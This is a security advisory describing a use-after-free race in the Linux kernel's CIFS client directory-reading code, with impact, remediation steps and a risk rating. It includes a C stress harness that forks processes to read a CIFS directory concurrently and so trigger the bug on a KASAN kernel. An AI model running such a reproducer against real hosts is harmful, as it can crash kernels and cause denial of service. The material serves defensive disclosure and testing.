Linux Kernel CIFS Client Use-After-Free Vulnerability in Directory Reading

Vulnerability

A use-after-free vulnerability has been identified in the CIFS client of the Linux kernel, in the directory reading (readdir) path. The bug is a race condition: a readdir operation can still access its response buffer after a concurrent operation has already freed it, corrupting kernel memory. On kernels built with KASAN (Kernel Address Sanitizer) the bug surfaces as a slab-use-after-free report; on production kernels without KASAN it produces silent memory corruption or an oops instead of a clear report. The issue was reported against Linux kernel version 6.15.0-rc6 and has been addressed in subsequent releases.

Impact

A local user who can read directories on a mounted CIFS share can trigger the race. The most likely outcome is a kernel crash (denial of service); because the freed buffer lives in a slab cache that can be reallocated, memory corruption leading to arbitrary code execution in the kernel cannot be ruled out.

Reproduction

The vulnerability can be reproduced by running a program that performs concurrent directory read operations on a CIFS file system: mount a CIFS share, then have several processes read the same directory repeatedly and simultaneously. The race causes one process to touch a response buffer that has already been freed on another process's path, triggering the use-after-free. A kernel built with CONFIG_KASAN is needed to get a clear slab-use-after-free report in dmesg; without it the symptom is a crash or silent corruption.
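The following stress harness is an added example illustrating the reproduction pattern described above; it is not code from the original page or from the kernel report. It assumes a CIFS share is already mounted at the path given on the command line (defaulting to a hypothetical /mnt/cifs) and that the kernel under test was built with CONFIG_KASAN, so a use-after-free shows up in dmesg rather than as silent corruption. It forks several workers that each open, iterate and close the directory in a loop so that readdir requests overlap in time.

```c
// Constructed stress harness (added example, not the kernel's or any reporter's code).
// Assumes: a CIFS share is already mounted at the path passed in (default /mnt/cifs is
// a hypothetical mount point); the kernel was built with CONFIG_KASAN so a
// use-after-free is reported in dmesg rather than silently corrupting memory.
#include <dirent.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Iterate the directory once; return the number of entries, or -1 on error. */
static long scan_dir_once(const char *path)
{
    DIR *d = opendir(path);
    if (!d)
        return -1;
    long n = 0;
    errno = 0;                       /* readdir returns NULL at EOF and on error */
    struct dirent *de;
    while ((de = readdir(d)) != NULL) {
        (void)de;
        n++;
    }
    int saved = errno;
    closedir(d);
    if (saved != 0) {
        errno = saved;
        return -1;
    }
    return n;
}

/* Worker body: scan `iters` times; exit status 0 on success, 1 on any failure. */
static int child_loop(const char *path, int iters)
{
    for (int i = 0; i < iters; i++)
        if (scan_dir_once(path) < 0)
            return 1;
    return 0;
}

/*
 * Fork `nprocs` workers that hammer readdir on `path` concurrently.
 * Returns 0 if every worker completed every iteration, the number of workers
 * that failed otherwise, or -1 if fork() itself failed.
 * On a vulnerable KASAN kernel the interesting result is not this return
 * value but the "slab-use-after-free" report that appears in dmesg.
 */
int stress_readdir(const char *path, int nprocs, int iters)
{
    pid_t *pids = calloc((size_t)nprocs, sizeof *pids);
    if (!pids)
        return -1;
    int started = 0;
    for (int i = 0; i < nprocs; i++) {
        pid_t p = fork();
        if (p < 0)
            break;
        if (p == 0)
            _exit(child_loop(path, iters));   /* child: never returns here */
        pids[started++] = p;
    }
    int failed = 0;
    for (int i = 0; i < started; i++) {
        int status = 0;
        if (waitpid(pids[i], &status, 0) < 0 ||
            !WIFEXITED(status) || WEXITSTATUS(status) != 0)
            failed++;
    }
    free(pids);
    if (started < nprocs)
        return -1;
    return failed;
}

int main(int argc, char **argv)
{
    const char *path = argc > 1 ? argv[1] : "/mnt/cifs";   /* assumed mount point */
    int nprocs = argc > 2 ? atoi(argv[2]) : 8;
    int iters  = argc > 3 ? atoi(argv[3]) : 1000;
    int r = stress_readdir(path, nprocs, iters);
    printf("stress_readdir(%s): %d worker(s) failed; check dmesg for KASAN output\n",
           path, r);
    return r == 0 ? 0 : 1;
}
```

Run it as `./stress /mnt/cifs 16 5000` on a KASAN kernel and watch `dmesg -w` in another terminal; a populated directory (many entries, so that the server needs more than one response) gives the readers more chances to overlap. On a patched kernel the harness completes with no KASAN output.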

Remediation

Users should upgrade to a stable kernel release that contains the fix, either from the upstream kernel.org tree or from their distribution's package manager; distributions commonly backport the fix to older kernel lines, so compare the running version (uname -r) against the distribution's advisory rather than against the upstream version number alone. Where an upgrade is not immediately possible, avoid mounting CIFS shares on affected hosts, or unload and blacklist the cifs module on systems that do not need it.

Added: Jun 18, 2025, 11:17 AM
Updated: Jun 18, 2025, 11:17 AM

Vulnerability Rating

Custom Algorithm
spread: 9.0
impact: 2.5
exploitability: 3.9
remediation: 0.0
relevance: 0.2
threat: 4.8
urgency: 2.9
incentive: 1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.